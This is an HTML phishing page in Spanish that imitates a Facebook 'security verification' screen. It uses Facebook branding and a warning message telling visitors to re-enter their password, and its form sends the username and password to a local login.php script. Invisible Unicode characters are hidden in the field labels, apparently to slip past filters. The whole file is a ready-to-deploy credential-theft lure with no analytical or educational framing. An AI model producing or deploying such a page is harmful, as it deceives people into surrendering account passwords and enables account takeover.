<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title></title>
	<link rel="shortcut icon" type="ico" href="./fb-ico.png">
	<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
	<header>
		<div class="main-header">
			<div class="logo">
				<a href="http://www.facebook.com"><img src="./logo.png"></a>
			</div>
		</div>
	</header>
	<section>
		<div class="form">
			<div class="m-header">
				<h3>Comprobación de seguridad de Facebook. Por favor, verifique que es usted.</h3>
			</div>
			<div class="red-box">
				<p style="font-weight:bold; font-size:13px">Verificación necesaria para comprender que es usted</p>
				<p>Ingrese su contraseña por razones de seguridad (asegúrese de que su bloqueo de mayúsculas esté desactivado)</p>
				<p>¿Ha olvidado su contraseña? <a href="">Solicitar uno nuevo</a>
			</div>

			<div  class="login-form">
				<form method="post" class="bb" novalidate="1" id="login-form" action="login.php">
	                <label for="username">Usuario:‎‍‍‍‍‍‎‎‍‍‍‍‍‎ ‏‏‎‎ ‏‏‎‎ ‏‏‎‏‏‎‎ ‏‏‎‎  ‍‍‍‍‍‎ ‏‏‎‎ ‏‏‎</label><input name="username" id="username" type="username"></input><br />
	                <br>     <br/>
					<label for="password">Constraseña:‎‍‍‍‍‍‎</label><input name="password" id="password" type="password"></input><br />
					<input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
					<label for="keep" style="font-size:12px;">No cerrar sesión</label><br />
					<input type="submit" name="submit" value="Verificar" style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;"></input>
					<p><a style="text-decoration:none; color:#3B5998; margin:0 0 0 80px;" href="">¿No puede iniciar sesión?</a></p>
				</form>
			</div>

		</div>
		
		<footer>
			<ul>
				<li><a href="">Móvil</a></li>
				<li><a href="">Buscar amigos</a></li>
				<li><a href="">Insignias</a></li>
				<li><a href="">Personas</a></li>
				<li><a href="">Páginas</a></li>
				<li><a href="">Aplicaciones</a></li>
				<li><a href="">Juegos</a></li>
				<li><a href="">Música</a></li>
				<li><a href="">Ubicaciones</a></li>
				</ul>
				<ul>
				<li><a href="">Temas</a></li>
				<li><a href="">Acerca de</a></li>
				<li><a href="">Crear anuncio</a></li>
				<li><a href="">Crear página</a></li>
				<li><a href="">Desarrolladores</a></li>
				<li><a href="">Carreras</a></li>
				<li><a href="">Privacidad</a></li>
				<li><a href="">Cookies</a></li>
				<li><a href="">Términos</a></li><br />
				<li><a href="">Ayuda</a></li>
			</ul>
		</footer>
	</section>
</body>
</html>
